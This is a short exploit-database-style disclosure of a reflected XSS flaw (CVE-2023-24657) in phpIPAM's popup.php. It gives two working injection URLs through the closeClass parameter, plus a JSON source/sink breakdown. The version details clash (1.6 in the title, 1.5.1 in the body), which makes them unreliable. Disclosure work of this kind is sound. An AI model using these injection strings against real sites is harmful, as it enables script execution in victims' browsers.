# Exploit Title: [phpIPAM 1.6 Reflected XSS via closeClass Parameter in popup.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/phpipam/phpipam]
# Software Link: [https://github.com/phpipam/phpipam]
# Version: [1.5.1] 
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2023-24657]
PoC:
1)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
2)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22
Details:
{
    "Sink": "print @$_REQUEST['closeClass']",
    "Vulnerable Variable": "closeClass",
    "Source": "$_REQUEST['closeClass']",
    "Sanitization Mechanisms Before Patch": "None",
    "Sink Context Constraints": "Reflected within HTML attributes without escaping",
    "Attack Payload": "\" onclick=\"alert(1)\"",
    "Execution Path Constraints": "Directly accessed from the 'closeClass' parameter without modification",
    "Request URL": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22",
    "Request Method": "GET",
    "Final PoC": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22"
}


[Replace Your Domain Name]